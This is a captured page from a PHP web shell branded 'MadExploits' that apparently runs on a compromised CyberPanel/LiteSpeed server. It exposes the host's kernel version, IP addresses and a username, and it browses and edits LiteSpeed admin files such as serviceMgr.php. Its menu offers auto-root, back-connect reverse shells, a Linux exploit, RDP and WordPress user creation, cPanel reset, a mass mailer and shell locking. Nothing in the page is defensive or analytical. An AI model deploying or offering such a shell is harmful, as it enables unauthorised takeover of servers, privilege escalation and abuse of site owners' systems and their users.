Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
view /
[ HOME SHELL ]
Name
Size
Permission
Action
inc
[ DIR ]
drwxr-xr-x
UIBase.php
10.79
KB
-rw-r--r--
UIProperty.php
1.16
KB
-rw-r--r--
ajax_data.php
7.74
KB
-rw-r--r--
compilePHP.php
16.21
KB
-rw-r--r--
confMgr.php
938
B
-rw-r--r--
dashboard.php
19.07
KB
-rw-r--r--
logviewer.php
5.31
KB
-rw-r--r--
realtimestats.php
17.3
KB
-rw-r--r--
serviceMgr.php
739
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : serviceMgr.php
<?php require_once("inc/auth.php"); $act = UIBase::GrabGoodInput("any",'act'); $actId = UIBase::GrabGoodInput("any",'actId'); switch ($act) { case 'restart': Service::ServiceRequest(SInfo::SREQ_RESTART_SERVER); break; case 'lang': DMsg::SetLang($actId); break; case 'toggledebug': Service::ServiceRequest(SInfo::SREQ_TOGGLE_DEBUG); break; case 'reload': if ($actId != '') { Service::ServiceRequest(SInfo::SREQ_VH_RELOAD, $actId); } break; case 'disable': if ($actId != '') { Service::ServiceRequest(SInfo::SREQ_VH_DISABLE, $actId); } break; case 'enable': if ($actId != '') { Service::ServiceRequest(SInfo::SREQ_VH_ENABLE, $actId); } break; default: error_log("illegal act $act "); }
Close